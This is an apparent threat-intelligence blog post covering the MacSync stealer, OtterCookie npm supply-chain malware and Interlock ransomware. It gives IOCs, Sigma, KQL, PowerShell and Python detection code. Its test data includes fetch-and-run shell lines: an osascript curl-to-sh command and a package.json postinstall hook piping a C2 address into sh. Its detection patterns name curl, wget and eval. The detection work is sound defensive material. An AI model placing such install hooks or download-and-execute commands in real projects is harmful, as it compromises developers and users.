
MacSync & OtterCookie Stealers: North Korean Supply Chain & macOS Campaigns with Interlock Ransomware CVE Exploits — OTX Analysis

Security Arsenal Team
April 14, 2026
5 min read

Intelligence Source: AlienVault OTX Live Pulses
Date: 2026-04-14
Author: Security Arsenal Threat Intelligence Unit

---

## Threat Summary

Recent OTX pulses show three high-impact threats converging on distinct sectors: macOS users in SLTT government, software developers in the technology sector, and enterprises running exposed Cisco management infrastructure.

1. macOS MaaS Campaign: The MacSync Stealer campaign has matured into a Malware-as-a-Service (MaaS) operation. It actively targets State, Local, Tribal, and Territorial (SLTT) government entities using SEO poisoning and "ClickFix" fake CAPTCHA lures that trick the user into pasting a command into Terminal. The malware has shifted to shell-based loaders that fetch and execute dynamically generated AppleScript payloads.

2. North Korean Supply Chain Attack: The FAMOUS CHOLLIMA threat actor is using the npm ecosystem to distribute the OtterCookie infostealer. Through the "contagious interview" scam (fake job interviews whose coding tasks require running attacker-supplied code) and typosquatting, the actor publishes clones of legitimate libraries (e.g., big.js) that deliver BeaverTail and InvisibleFerret to developers in the technology sector.

3. Ransomware & Zero-Day Exploitation: The Interlock Ransomware Group is exploiting critical vulnerabilities, most notably a zero-day in Cisco Firepower Management Center (CVE-2026-20131). This exploitation delivers custom tooling including GHOSTKNIFE and PlasmaLoader.

Collectively, these threats show an aggressive push for initial access via social engineering and supply chain compromise, followed immediately by credential theft and, in Interlock's case, ransomware deployment.

---

## Threat Actor / Malware Profile

### MacSync Stealer (Unknown Actor)
* Type: Infostealer / MaaS
* Target: macOS users (Government/SLTT)
* Distribution: SEO poisoning, fake ClickFix CAPTCHAs, malicious "ChatGPT" conversations.
* Payload: Shell-based loaders executing dynamically fetched AppleScript.
* Capability: Steals cryptocurrency wallets (including Ledger), browser data, and system information.

### FAMOUS CHOLLIMA (OtterCookie Campaign)
* Attribution: North Korean APT (Lazarus Group adjunct).
* Type: Supply Chain Attack / Infostealer
* Target: Software developers / technology sector
* Distribution: Obfuscated malicious npm packages, delivered through typosquatted clones of popular libraries and dependency confusion.
* Malware: OtterCookie, BeaverTail, InvisibleFerret, Koalemos.
* C2: Vercel-hosted C2 infrastructure and direct raw-IP communication.
* Persistence: SSH backdoor installation.

### Interlock Ransomware Group
* Type: Ransomware-as-a-Service / Exploitation
* Tooling: GHOSTKNIFE, GHOSTSABER, PlasmaLoader, PLASMAGRID.
* Vector: Exploitation of CVE-2026-20131 (Cisco FMC zero-day) and other high-risk CVEs.

---

## IOC Analysis

The pulses provide a mix of infrastructure and file-based indicators:

* File hashes (SHA256/MD5): Specific to the MacSync Stealer payloads. Use them to sweep macOS endpoints for malware artifacts; a hash match is high-fidelity but only catches the exact samples seen so far, so pair it with the behavioural rules below.
* Domains/Hostnames: Compromised legitimate domains (e.g., houstongaragedoorinstallers.com) used for C2 or payload distribution in the MacSync campaign.
These should be sinkholed or blocked at the proxy/DNS level; because they are compromised legitimate sites, review the blocks periodically once the owners have cleaned them up.
* IPv4 addresses: A cluster of IPs (e.g., 144.172.110.228) associated with OtterCookie C2 infrastructure. Block the listed addresses; widening a block to the containing /24 trades precision for coverage and should be a deliberate decision.
* CVEs: Critical identifiers (e.g., CVE-2026-20131) requiring immediate patch-management prioritization.

Operationalizing IOCs:
* EDR: Hunt for the file hashes on macOS endpoints.
* Firewall/Proxy: Block the listed domains and IP addresses.
* Vulnerability Management: Immediately scan for Cisco FMC and the other vulnerabilities listed in the Interlock pulse.

---

## Detection Engineering

The following detection logic is tailored to the specific behaviours of MacSync (macOS scripting), OtterCookie (Node.js supply chain), and Interlock (infrastructure exploitation). The network rule lists the specific C2 addresses from the pulses rather than whole prefixes, so it stays precise when the surrounding hosting ranges are reassigned.

```yaml
---
title: macOS MacSync Stealer Suspicious AppleScript Execution
description: Detects shell-based loaders executing dynamic AppleScript payloads associated with MacSync Stealer, typically spawned from a browser after a fake CAPTCHA (ClickFix) workflow.
status: experimental
date: 2026/04/14
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/66000000000/
tags:
  - attack.execution
  - attack.t1059.002
logsource:
  product: macos
  category: process_creation
detection:
  selection:
    ParentImage|endswith:
      - '/Google Chrome'
      - '/Firefox'
      - '/Safari'
    Image|endswith:
      - '/osascript'
      - '/sh'
      - '/zsh'
    CommandLine|contains:
      - 'curl'
      - 'wget'
      - 'http://'
      - 'https://'
  condition: selection
falsepositives:
  - Legitimate administrative automation scripts launched from a browser helper
level: high
---
title: OtterCookie Node.js Supply Chain Attack
description: Detects Node.js processes spawning a shell or PowerShell, a hallmark of the OtterCookie/BeaverTail npm supply chain campaign.
status: experimental
date: 2026/04/14
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/66000000001/
tags:
  - attack.execution
  - attack.t1059.001
  - attack.t1204.002
logsource:
  product: windows
  category: process_creation
detection:
  selection_parent:
    ParentImage|endswith:
      - '\node.exe'
      - 'node'
  selection_child:
    Image|endswith:
      - '\powershell.exe'
      - '\cmd.exe'
      - '\bash.exe'
      - '\wsl.exe'
  condition: selection_parent and selection_child
falsepositives:
  - Legitimate developer build scripts (low volume; baseline per build host)
level: high
---
title: OtterCookie and Interlock Known C2 Infrastructure Connection
description: Detects outbound connections to C2 addresses listed in the OtterCookie and Interlock Ransomware pulses.
status: experimental
date: 2026/04/14
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/66000000002/
tags:
  - attack.command_and_control
logsource:
  category: network_connection
detection:
  selection:
    DestinationIp:
      - '144.172.110.228'
      - '144.172.110.96'
      - '144.172.110.132'
      - '144.172.116.22'
      - '144.172.93.169'
      - '144.172.93.253'
      - '144.172.99.248'
      - '107.189.22.20'
  condition: selection
falsepositives:
  - Addresses later reassigned by the hosting provider; re-validate the list before alerting at this level
level: critical
```

### KQL Hunt (Microsoft Sentinel)

```kql
// Hunt for OtterCookie/Interlock C2 IPs and MacSync file hashes.
// A KQL query ends in exactly one tabular expression, so the two hunts are joined with union
// rather than written as two statements.
let C2_IPs = dynamic(["144.172.110.228", "144.172.110.96", "144.172.110.132", "107.189.22.20"]);
let MacSync_MD5 = dynamic(["5190ef1733183a0dc63fb623357f56d6"]);
let MacSync_SHA256 = dynamic(["866993e9950250ac2ce8c3b4c6a8bd39285e0fafd93860f235a3b0370f160dd1"]);
union
(
    // Network connections to C2 infrastructure
    DeviceNetworkEvents
    | where RemoteIP in (C2_IPs)
    | project Timestamp, DeviceName, Indicator = RemoteIP,
              Context = strcat(InitiatingProcessFileName, " -> ", RemoteUrl, ":", tostring(RemotePort)),
              Alert = "C2 connection to OtterCookie/Interlock IP"
),
(
    // File artifacts for MacSync
    DeviceFileEvents
    | where SHA256 in (MacSync_SHA256) or MD5 in (MacSync_MD5)
    | project Timestamp, DeviceName, Indicator = SHA256,
              Context = strcat(FolderPath, "\\", FileName),
              Alert = "MacSync Stealer file detected"
)
| order by Timestamp desc
```

### PowerShell Hunt Script

```powershell
# IOC hunter for MacSync hashes and OtterCookie C2 IPs
# Run elevated: Get-NetTCPConnection needs admin rights to resolve owning processes of other users.

$MacSyncHashes = @(
    "866993e9950250ac2ce8c3b4c6a8bd39285e0fafd93860f235a3b0370f160dd1",
    "b2955c54eb0c047463993b379e015e737aabed37b456aeb0957cf84cdb0ed1f0",
    "c56a1b268f358d9fb4d6264932706b53a7347e2544bb5f26355b0c7fc1d299d8"
)

$OtterCookieIPs = @(
    "144.172.110.228", "144.172.110.96", "144.172.110.132", "144.172.116.22",
    "144.172.93.169", "144.172.93.253", "144.172.99.248", "107.189.22.20"
)

# Hashing a whole volume is slow; start with user-writable locations where a dropped payload would land.
$ScanRoots = @("$env:USERPROFILE\Downloads", "$env:TEMP", "$env:APPDATA")

Write-Host "[+] Scanning for MacSync Stealer file hashes..." -ForegroundColor Cyan
Get-ChildItem -Path $ScanRoots -Recurse -File -ErrorAction SilentlyContinue |
    Where-Object { $_.Length -gt 0 -and $_.Length -lt 50MB } |
    ForEach-Object {
        # FileInfo has no Hash property; compute SHA256 explicitly. -contains compares case-insensitively.
        $hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        if ($hash -and $MacSyncHashes -contains $hash) { $_ }
    } |
    Select-Object FullName, LastWriteTime | Format-Table -AutoSize

Write-Host "[+] Checking active TCP connections for OtterCookie C2 IPs..." -ForegroundColor Cyan
# Get-NetTCPConnection returns structured objects, so there is no netstat text to parse and no need
# to assign the read-only automatic variable $PID.
Get-NetTCPConnection -ErrorAction SilentlyContinue |
    Where-Object { $OtterCookieIPs -contains $_.RemoteAddress } |
    ForEach-Object {
        $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
        Write-Host ("[!] Suspicious connection: {0}:{1} state {2} (PID {3} - {4})" -f `
            $_.RemoteAddress, $_.RemotePort, $_.State, $_.OwningProcess, $proc.ProcessName) -ForegroundColor Red
    }
```

---

## Response Priorities

* Immediate (0-24h):
  * Block all IOCs (domains and IP addresses) at the network perimeter.
  * Sweep macOS endpoints for the MacSync Stealer file hashes.
  * Identify and block the malicious npm packages associated with the OtterCookie campaign in internal artifact repositories and registry proxies.

* 24h - 48h:
  * Credential reset: If MacSync or OtterCookie execution is suspected, rotate SSH keys and browser-saved credentials and invalidate active sessions for the affected users. Treat any cryptocurrency wallet seed present on the host as exposed and move funds to a freshly generated wallet.
  * Hunt: Run the PowerShell/KQL queries above to identify lateral movement or persistence, including unexpected SSH authorized_keys entries on developer hosts.

* 1 Week:
  * Patch management: Prioritize patching for CVE-2026-20131 (Cisco FMC) and the 31 high-impact vulnerabilities listed in the March 2026 CVE landscape.
  * Supply chain hardening: Enforce package verification and allow-listing for npm and internal package registries, and disable automatic lifecycle scripts (`npm config set ignore-scripts true`) wherever builds permit.
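To show what the three Sigma rules above actually fire on, here is an added example (not part of the original advisory or of any vendor tooling) that implements the subset of Sigma matching the rules use (`endswith`, `contains`, exact match, selections ANDed by the condition) and runs it over constructed process and network events. Field names follow Sigma's `process_creation` and `network_connection` conventions; the events themselves are invented for the demonstration and are not from any real incident.

```python
"""Minimal evaluator for the page's Sigma detection blocks, run over constructed events."""

# Detection sections of the three rules above (selection maps and condition only).
RULES = {
    "MacSync suspicious AppleScript execution": {
        "selection": {
            "ParentImage|endswith": ["/Google Chrome", "/Firefox", "/Safari"],
            "Image|endswith": ["/osascript", "/sh", "/zsh"],
            "CommandLine|contains": ["curl", "wget", "http://", "https://"],
        },
        "condition": "selection",
    },
    "OtterCookie Node.js spawning shell": {
        "selection_parent": {"ParentImage|endswith": ["\\node.exe", "node"]},
        "selection_child": {
            "Image|endswith": ["\\powershell.exe", "\\cmd.exe", "\\bash.exe", "\\wsl.exe"]
        },
        "condition": "selection_parent and selection_child",
    },
    "OtterCookie/Interlock known C2 IP": {
        "selection": {
            "DestinationIp": ["144.172.110.228", "144.172.110.96", "144.172.110.132", "107.189.22.20"]
        },
        "condition": "selection",
    },
}

# Sigma string modifiers used by the rules; Sigma string matching is case-insensitive.
MODIFIERS = {
    "endswith": lambda value, pattern: value.endswith(pattern),
    "startswith": lambda value, pattern: value.startswith(pattern),
    "contains": lambda value, pattern: pattern in value,
    None: lambda value, pattern: value == pattern,
}


def field_matches(event, key, patterns):
    """A list of patterns for one field is OR'ed, as in Sigma."""
    field, _, modifier = key.partition("|")
    value = str(event.get(field, "")).lower()
    test = MODIFIERS[modifier or None]
    return any(test(value, p.lower()) for p in patterns)


def selection_matches(event, selection):
    """Fields inside one selection map are AND'ed, as in Sigma."""
    return all(field_matches(event, key, pats) for key, pats in selection.items())


def rule_matches(event, rule):
    # Only "name" and "name and name" conditions are needed for the page's rules.
    names = [n.strip() for n in rule["condition"].split(" and ")]
    return all(selection_matches(event, rule[n]) for n in names)


def hunt(events):
    """Return (event id, rule title) for every rule hit, in event order."""
    return [(e["id"], title) for e in events for title, rule in RULES.items() if rule_matches(e, rule)]


# Constructed sample events (assumed field names; not from a real incident).
SAMPLE_EVENTS = [
    {"id": 1, "ParentImage": "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome",
     "Image": "/usr/bin/osascript",
     "CommandLine": "osascript -e 'do shell script \"curl -s https://example.invalid/p | sh\"'"},
    {"id": 2, "ParentImage": "/Applications/Safari.app/Contents/MacOS/Safari",
     "Image": "/bin/zsh", "CommandLine": "zsh -c 'open -a Preview'"},  # browser -> shell, no download
    {"id": 3, "ParentImage": "C:\\Program Files\\nodejs\\node.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd /c powershell -enc ..."},
    {"id": 4, "ParentImage": "C:\\Program Files\\nodejs\\node.exe",
     "Image": "C:\\Program Files\\nodejs\\node.exe", "CommandLine": "node build.js"},  # node -> node
    {"id": 5, "DestinationIp": "144.172.110.228", "DestinationPort": 443},
    {"id": 6, "DestinationIp": "144.172.111.228", "DestinationPort": 443},  # adjacent /24, not listed
]

if __name__ == "__main__":
    for event_id, title in hunt(SAMPLE_EVENTS):
        print(f"event {event_id}: {title}")
```

Events 2, 4 and 6 are the negative cases worth keeping in a test set: a browser-spawned shell with no download, Node spawning Node during a normal build, and a neighbouring address that an over-broad prefix match would have flagged.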
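The supply chain hardening item above (package verification and allow-listing against typosquatted clones such as the big.js lookalike) is the kind of check that belongs in CI before `npm install` runs. The following is an added example, not code from the advisory or from npm, of a manifest audit that flags dependencies missing from an allowlist, names within a small edit distance of watched popular packages, and lifecycle scripts that fetch or execute remote content. The allowlist, the watched-name list and the sample package.json are constructed assumptions; the C2 address in the sample script is taken from the page's IOC list purely as sample data.

```python
"""Pre-install audit of an npm manifest for the OtterCookie-style tradecraft described above."""
import json
import re

# Packages approved in the internal registry (assumption for the example).
ALLOWED = {"big.js", "express", "lodash"}
# Popular names that typosquatters imitate; big.js is the one named in the pulse.
WATCHED = ("big.js", "express", "lodash", "react")
# npm hooks that run automatically on install.
LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")
# Tokens that have no business in an install hook of a library.
SUSPICIOUS = re.compile(r"curl|wget|node\s+-e|eval\(|base64|child_process|https?://|powershell", re.I)


def levenshtein(a, b):
    """Edit distance by the classic two-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def audit_manifest(manifest):
    """Return (finding type, detail) tuples for a parsed package.json."""
    findings = []
    deps = {**manifest.get("dependencies", {}), **manifest.get("devDependencies", {})}
    for name in deps:
        if name not in ALLOWED:
            findings.append(("not-allowlisted", name))
        for known in WATCHED:
            # Distance 1-2 from a watched name but not equal to it is the typosquat signature.
            if name != known and levenshtein(name.lower(), known) <= 2:
                findings.append(("typosquat-candidate", f"{name} ~ {known}"))
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook in LIFECYCLE and SUSPICIOUS.search(cmd):
            findings.append(("suspicious-lifecycle-script", f"{hook}: {cmd}"))
    return findings


def audit_package_json(text):
    return audit_manifest(json.loads(text))


# Constructed package.json modelled on a fake "interview task" repository (not a real sample).
SAMPLE_PACKAGE_JSON = """{
  "name": "interview-task",
  "dependencies": {"express": "^4.19.0", "bigjs": "6.2.1", "lodash": "^4.17.21"},
  "scripts": {
    "postinstall": "node -e \\"require('child_process').exec('curl -s http://144.172.110.228/x | sh')\\"",
    "test": "jest"
  }
}"""
SAMPLE_MANIFEST = json.loads(SAMPLE_PACKAGE_JSON)

if __name__ == "__main__":
    for kind, detail in audit_package_json(SAMPLE_PACKAGE_JSON):
        print(f"[{kind}] {detail}")
```

Run it as a CI gate that fails the build on any finding; pairing it with `npm install --ignore-scripts` in the same pipeline removes the install-hook execution path entirely, so a typosquatted package can at most land on disk rather than run.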

Tags: darkweb, otx-pulse, darkweb-apt, macsync-stealer, ottercookie, famous-chollima, interlock-ransomware, supply-chain-attack
